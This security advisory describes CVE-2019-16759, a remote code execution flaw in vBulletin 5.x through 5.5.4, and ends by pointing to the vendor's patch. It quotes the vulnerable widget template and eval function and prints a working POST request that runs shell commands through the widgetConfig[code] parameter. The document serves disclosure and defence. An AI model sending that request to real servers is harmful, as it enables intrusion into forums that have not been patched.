A critical remote code execution (RCE) vulnerability affecting one of the widely used internet forum software vBulletin has been publicly disclosed. The vulnerability is identified with CVE-2019-16759 and allows an attacker to execute any command on the website like uploading malware, uploading shells or tampering with the website’s code. This vulnerability is believed to be known, utilized and sold by researchers and attackers for years.
Technical Details:
The vulnerability resides in the way vBulletin’s PHP widget file of the forum software package accepts configurations via the URL parameters and then parses them on the server without proper safety checks. vBulletin’s PHP widgets are rendered at run-time and used to create dynamic widgets without having to directly access the hosting server. Attacker can force the website to render arbitrary widgets using the ajax/render/widget_php route and execute any arbitrary code. Below are contents of the file ajax/render/widget_php.
<div class="widget-content">
<vb:if condition="!empty($widgetConfig['code']) AND
!$vboptions['disable_php_rendering']">
{vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}}
{vb:raw $evaledPHP}
<vb:else />
<vb:if condition="$user['can_use_sitebuilder']">
<span class="note">{vb:phrase click_edit_to_config_module}</span>
</vb:if>
</vb:if>
</div>
A callback to the evalCode function from above code executes any command passed in the $code argument. This can be used to execute any command available on the system, open firewall ports or download and execute files and scripts. The function evalCode is found in includes/vb5/frontend/controller/bbcode.php.
function evalCode($code)
{
ob_start();
// find in: public_html/includes/vb5/frontend/controller/bbcode.php
eval($code);
$output = ob_get_contents();
ob_end_clean();
return $output;
}
A typical POST request executing ‘id’ command on a vulnerable vBulletin could be:
POST / HTTP/1.1
Host: 192.168.1.12
Content-Length: 108
Content-Type: application/x-www-form-urlencoded
routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27id%27%29%3B+exit%3BOn receiving this request, the server forwards the “id” command to evalCode function and returns its response back to the client. The manipulation of the argument widgetConfig[code] as part of a parameter thus leads to command execution.
Publicly available PoC:
A proof-of-concept code is publicly available for this vulnerability. Since the release of the PoC, this vulnerability is being wildly exploited and many users have reported attacks on their forums using this vulnerability. Also a botnet has been reported utilizing this disclosed vBulletin exploit to secure vulnerable servers so that they cannot be used by other attackers. The botnet hacks into a vulnerable server with the exploit and then uses it to modify the evalCode function in source code file so that it requires a password to execute commands.
Thousands of websites utilize this forum software including organizations such as Pearl Jam, NASA, EA, STEAM, Houston Texans, Sony Pictures, Zynga, and more.
Affected Versions:
All vBulletin forum versions 5.x through 5.5.4 are affected.
Impact:
This vulnerability allows an attacker to execute arbitrary code on the affected system.
Solution:
An official patch has been released by vBulletin. Apply the latest Security patches available for download from the vendor.